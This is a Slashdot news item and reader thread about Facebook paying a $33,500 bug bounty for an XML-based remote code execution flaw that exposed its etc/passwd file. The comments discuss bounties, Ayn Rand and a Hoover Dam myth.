Facebook's Biggest Bounty Yet To Hacker Who Found "Keys To the Kingdom" 111
mask.of.sanity writes "Facebook has paid out its largest bug bounty of $33,500 for a serious remote code execution vulnerability which also returned Facebook's etc/passwd. The researcher could change Facebook's use of Gmail as an OpenID provider to a URL he controlled, and then sent a request carrying malicious XML code. The Facebook response included its etc/passwd which contained essential login information such as system administrator data and user IDs. The company quickly patched the flaw and awarded him for the proof of concept remote code execution which he quietly disclosed to them."
Comment removed (Score:1, Interesting)
Re:a pittance in ayn rands america. (Score:4, Interesting)
Re:a pittance in ayn rands america. (Score:2, Interesting)
More than one worker drowned in concrete during the construction of the Hoover Dam, and there are bodies entombed in the blockwork.
Many workers died constructing the dam, yes. But none of them drowned in the concrete pours (they may have drowned in the mixing buckets; I don't know about that), and nobody is entombed in the blockwork. A human body is much weaker than concrete - a body in the mix would have compromised the structural integrity of that area. Even if someone had drowned in a pour, which would have been very difficult given that each pour only raised the concrete level by about an inch, the body would have been pulled out as an unacceptable structural risk.
http://en.wikipedia.org/wiki/Hoover_Dam#Concrete [wikipedia.org]
Re:a pittance in ayn rands america. (Score:3, Interesting)
You should reread Ayn Rand. In Atlas Shrugged, where she creates her "perfect society" people pay each other for everything. When Dagny stays over at John Galt's house and needed to use the stove, she gave him $0.05.
So Ayn would, I think, be happier to see bounties than Facebook saying, hey, give me this info for free.
And while they probably do have a security team, by crowdsourcing something like this you allow many, many, many more people to look at Facebook and fix it.
Re:/etc/password, not /etc/shadow! (Score:5, Interesting)
And, let's be honest, /etc/password sounds scary, and is probably the most attention-getting thing this guy could have said to the average person.